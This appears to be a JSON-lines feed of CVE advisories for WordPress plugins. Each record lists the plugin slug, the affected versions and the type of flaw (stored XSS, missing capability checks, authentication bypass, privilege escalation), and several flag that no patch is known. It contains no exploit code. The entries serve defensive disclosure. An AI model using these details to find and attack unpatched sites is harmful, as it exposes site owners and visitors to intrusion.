{"CVE_ID":"CVE-2024-1634","slug":"calendar-booking","versionImpact":"3.5.10","description":"The Scheduling Plugin \u2013 Online Booking for WordPress plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'cbsb_disconnect_settings' function in all versions up to, and including, 3.5.10. This makes it possible for unauthenticated attackers to disconnect the plugin from the startbooking service and remove connection data.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60e642f9-74ff-47f1-a49d-99c8fdb26f4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60e642f9-74ff-47f1-a49d-99c8fdb26f4a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/calendar-booking\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/calendar-booking\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1715","slug":"adfoxly","versionImpact":"1.8.5","description":"The AdFoxly \u2013 Ad Manager, AdSense Ads & Ads.txt plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the adfoxly_ad_status() function in all versions up to, and including, 1.8.5. This makes it possible for unauthenticated attackers to enable and disable ads.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84792202-d089-4dca-b950-16aea968c58e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84792202-d089-4dca-b950-16aea968c58e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adfoxly\\\/trunk\\\/includes\\\/class-adfoxly-ajax.php#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/adfoxly\\\/trunk\\\/includes\\\/class-adfoxly-ajax.php#L80\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9173","slug":"gf-custom-style","versionImpact":"2.0","description":"The GF Custom Style plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8500ac5b-44e6-47b9-ab16-e7636c3fea66?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8500ac5b-44e6-47b9-ab16-e7636c3fea66?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gf-custom-style\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gf-custom-style\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11783","slug":"finance-calculator-with-application-form","versionImpact":"2.2.1","description":"The Financial Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'finance_calculator' shortcode in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/finance-calculator-with-application-form\\\/tags\\\/2.2.1\\\/finance-calculator-with-aplication-form.php#L604\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/finance-calculator-with-application-form\\\/tags\\\/2.2.1\\\/finance-calculator-with-aplication-form.php#L604\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9314970-1030-4488-8147-05ba1453182c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9314970-1030-4488-8147-05ba1453182c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13117","slug":"share-buttons","versionImpact":"2.7","description":"The Social Share Buttons for WordPress plugin through 2.7 allows an unauthenticated user to upload arbitrary images and change the path where they are uploaded","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3234cdac-f328-4f1e-a1de-31fbd86aefb9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3234cdac-f328-4f1e-a1de-31fbd86aefb9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3609","slug":"short-tax-post","versionImpact":"2.1.2","description":"The Reales WP STPT plugin for WordPress is vulnerable to unauthorized user registration in all versions up to, and including, 2.1.2. This is due to the 'reales_user_signup_form' AJAX action not verifying if user registration is enabled, prior to registering a user. This makes it possible for unauthenticated attackers to create new user accounts, which can be leveraged with CVE-XX to achieve privilege escalation.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/reales-wp-real-estate-wordpress-theme\\\/10330568\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/reales-wp-real-estate-wordpress-theme\\\/10330568\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9f3250f-39a1-4ba1-b9a2-222926635ca0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9f3250f-39a1-4ba1-b9a2-222926635ca0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7228","slug":"link-party","versionImpact":"1.0","description":"The illi Link Party! WordPress plugin through 1.0 does not sanitise and escape some parameters, which could allow unauthenticated vistors to perform Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1ddf1271-3826-44e2-8408-cfbe9c3cc547\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1ddf1271-3826-44e2-8408-cfbe9c3cc547\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5589","slug":"streamweasels-kick-integration","versionImpact":"1.1.3","description":"The StreamWeasels Kick Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018status-classic-offline-text\u2019 parameter in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/streamweasels-kick-integration\\\/trunk\\\/public\\\/partials\\\/streamweasels-kick-status-public-display.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/streamweasels-kick-integration\\\/trunk\\\/public\\\/partials\\\/streamweasels-kick-status-public-display.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309930\\\/streamweasels-kick-integration\\\/trunk\\\/public\\\/partials\\\/streamweasels-kick-status-public-display.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309930\\\/streamweasels-kick-integration\\\/trunk\\\/public\\\/partials\\\/streamweasels-kick-status-public-display.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/streamweasels-kick-integration\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/streamweasels-kick-integration\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45f98a96-8f32-49f9-bfc8-9beb316ce0bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45f98a96-8f32-49f9-bfc8-9beb316ce0bc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7660","slug":"map-my-locations","versionImpact":"1.1","description":"The Map My Locations plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'map_my_locations' shortcode in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/map-my-locations\\\/trunk\\\/public\\\/class-map-my-locations-public.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/map-my-locations\\\/trunk\\\/public\\\/class-map-my-locations-public.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/map-my-locations\\\/trunk\\\/public\\\/partials\\\/map-my-locations-public-display.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/map-my-locations\\\/trunk\\\/public\\\/partials\\\/map-my-locations-public-display.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3c84ad1-10c7-4b2f-82f3-7546fc8e337d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3c84ad1-10c7-4b2f-82f3-7546fc8e337d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25148","slug":"wp-html-mail","versionImpact":"2.9.0.3","description":"The WP HTML Mail plugin for WordPress is vulnerable to HTML injection in versions up to, and including, 2.9.0.3 due to insufficient input sanitization. This makes it possible for unauthenticated attackers to inject arbitrary HTML in pages that execute if they can successfully trick a administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-vulnerable-to-html-injection\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-vulnerable-to-html-injection\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3af900c-4048-4f4f-93e9-c60ca34d015b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3af900c-4048-4f4f-93e9-c60ca34d015b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-html-mail\\\/trunk\\\/readme.txt\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-html-mail\\\/trunk\\\/readme.txt\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2709","slug":"an-gradebook","versionImpact":"5.0.1","description":"The AN_GradeBook WordPress plugin through 5.0.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2504dadb-1086-4fa9-8fc7-b93018423515\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2504dadb-1086-4fa9-8fc7-b93018423515\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4792","slug":"duplicate-post-page-menu-custom-post-type","versionImpact":"2.3.1","description":"The Duplicate Post Page Menu & Custom Post Type plugin for WordPress is vulnerable to unauthorized page and post duplication due to a missing capability check on the duplicate_ppmc_post_as_draft function in versions up to, and including, 2.3.1. This makes it possible for authenticated attackers with subscriber access or higher to duplicate posts and pages.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duplicate-post-page-menu-custom-post-type\\\/trunk\\\/duplicate-post-page-menu-cpt.php?rev=2871256#L383\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duplicate-post-page-menu-custom-post-type\\\/trunk\\\/duplicate-post-page-menu-cpt.php?rev=2871256#L383\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6bb08e8-9ef5-41db-a111-c377a5dfae77?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6bb08e8-9ef5-41db-a111-c377a5dfae77?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2963515%40duplicate-post-page-menu-custom-post-type&new=2963515%40duplicate-post-page-menu-custom-post-type&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2963515%40duplicate-post-page-menu-custom-post-type&new=2963515%40duplicate-post-page-menu-custom-post-type&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1559","slug":"link-library","versionImpact":"7.6","description":"The Link Library plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'll_reciprocal' parameter in all versions up to, and including, 7.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/407a5c69-cce0-4868-aef0-ffc88981e256?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/407a5c69-cce0-4868-aef0-ffc88981e256?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037265%40link-library&new=3037265%40link-library&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037265%40link-library&new=3037265%40link-library&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2172","slug":"miniorange-malware-protection","versionImpact":"4.7.2","description":"The Malware Scanner plugin and the Web Application Firewall plugin for WordPress (both by MiniOrange) are vulnerable to privilege escalation due to a missing capability check on the mo_wpns_init() function in all versions up to, and including, 4.7.2 (for Malware Scanner) and 2.1.1 (for Web Application Firewall). This makes it possible for unauthenticated attackers  to escalate their privileges to that of an administrator.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6347f588-a3fd-4909-ad57-9d78787b5728?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6347f588-a3fd-4909-ad57-9d78787b5728?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-malware-protection\\\/tags\\\/4.7.2\\\/handler\\\/login.php#L89\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/miniorange-malware-protection\\\/tags\\\/4.7.2\\\/handler\\\/login.php#L89\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/miniorange-malware-protection\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/miniorange-malware-protection\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0845","slug":"pdf-viewer-for-elementor","versionImpact":"2.9.3","description":"The PDF Viewer for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the render function in all versions up to, and including, 2.9.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d6f9c80-ef86-4910-a88e-98f2b444ee30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d6f9c80-ef86-4910-a88e-98f2b444ee30?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-viewer-for-elementor\\\/trunk\\\/widgets\\\/pdfjs-viewer.php#L215\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-viewer-for-elementor\\\/trunk\\\/widgets\\\/pdfjs-viewer.php#L215\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-viewer-for-elementor\\\/trunk\\\/widgets\\\/pdfjs-viewer.php#L219\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-viewer-for-elementor\\\/trunk\\\/widgets\\\/pdfjs-viewer.php#L219\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-viewer-for-elementor\\\/trunk\\\/widgets\\\/pdf-viewer.php#L256\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-viewer-for-elementor\\\/trunk\\\/widgets\\\/pdf-viewer.php#L256\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-viewer-for-elementor\\\/trunk\\\/widgets\\\/pdf-viewer.php#L260\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-viewer-for-elementor\\\/trunk\\\/widgets\\\/pdf-viewer.php#L260\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5802","slug":"mts-url-shortener","versionImpact":"1.0.17","description":"The URL Shortener by Myhop WordPress plugin through 1.0.17 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cd37f702-9144-4c98-9b08-c63e510cd97f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cd37f702-9144-4c98-9b08-c63e510cd97f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8108","slug":"share-this-image","versionImpact":"2.01","description":"The Share This Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'alignment' parameter in all versions up to, and including, 2.01 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cb5368f-99b1-43e3-a2e4-67e90c8edfcf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cb5368f-99b1-43e3-a2e4-67e90c8edfcf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.01\\\/includes\\\/modules\\\/gutenberg\\\/class-sti-gutenberg-init.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.01\\\/includes\\\/modules\\\/gutenberg\\\/class-sti-gutenberg-init.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/share-this-image\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/share-this-image\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.01\\\/includes\\\/modules\\\/gutenberg\\\/sti-gutenberg-buttons.js#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.01\\\/includes\\\/modules\\\/gutenberg\\\/sti-gutenberg-buttons.js#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.01\\\/includes\\\/modules\\\/gutenberg\\\/sti-gutenberg-buttons.js#L146\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.01\\\/includes\\\/modules\\\/gutenberg\\\/sti-gutenberg-buttons.js#L146\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3144334\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3144334\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9127","slug":"sola-testimonials","versionImpact":"3.0.0","description":"The Super Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018alignment\u2019 parameter in all versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54998b69-7dc5-49a4-8b8b-3419de73ed47?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54998b69-7dc5-49a4-8b8b-3419de73ed47?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sola-testimonials\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sola-testimonials\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sola-testimonials\\\/trunk\\\/includes\\\/gutenberg-blocks\\\/single-testimonial\\\/index.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sola-testimonials\\\/trunk\\\/includes\\\/gutenberg-blocks\\\/single-testimonial\\\/index.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sola-testimonials\\\/trunk\\\/includes\\\/gutenberg-blocks\\\/single-testimonial\\\/index.php#L84\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sola-testimonials\\\/trunk\\\/includes\\\/gutenberg-blocks\\\/single-testimonial\\\/index.php#L84\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11775","slug":"particle-background","versionImpact":"1.0.2","description":"The Particle Background plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'particleground' shortcode in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/particle-background\\\/trunk\\\/particleground.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/particle-background\\\/trunk\\\/particleground.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/particle-background\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/particle-background\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42cf84d1-37f5-41c1-838d-67244f17c55d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42cf84d1-37f5-41c1-838d-67244f17c55d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13182","slug":"wp-directorybox-manager","versionImpact":"2.5","description":"The WP Directorybox Manager plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 2.5. This is due to incorrect authentication in the 'wp_dp_parse_request' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/wp-directorybox-manager\\\/elements\\\/login\\\/cs-social-login\\\/cs-social-login.php#L43\",\"name\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/wp-directorybox-manager\\\/elements\\\/login\\\/cs-social-login\\\/cs-social-login.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea9e5e5d-a7fc-4159-a2ae-610bee76f818?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea9e5e5d-a7fc-4159-a2ae-610bee76f818?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1757","slug":"uber-grid","versionImpact":"1.1.7","description":"The WordPress Portfolio Builder \u2013 Portfolio Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'pfhub_portfolio' and 'pfhub_portfolio_portfolio' shortcodes in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/trunk\\\/src\\\/Frontend.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/trunk\\\/src\\\/Frontend.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/trunk\\\/src\\\/Frontend.php#L542\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uber-grid\\\/trunk\\\/src\\\/Frontend.php#L542\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36dcf1c4-1e0a-4ab6-a1b3-a9fe3aaddd0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36dcf1c4-1e0a-4ab6-a1b3-a9fe3aaddd0b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7197","slug":"wordpress-twitterbot","versionImpact":"1.11","description":"The Marketing Twitter Bot WordPress plugin through 1.11 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26deaa7c-e331-42a0-9310-31d08871154c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26deaa7c-e331-42a0-9310-31d08871154c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
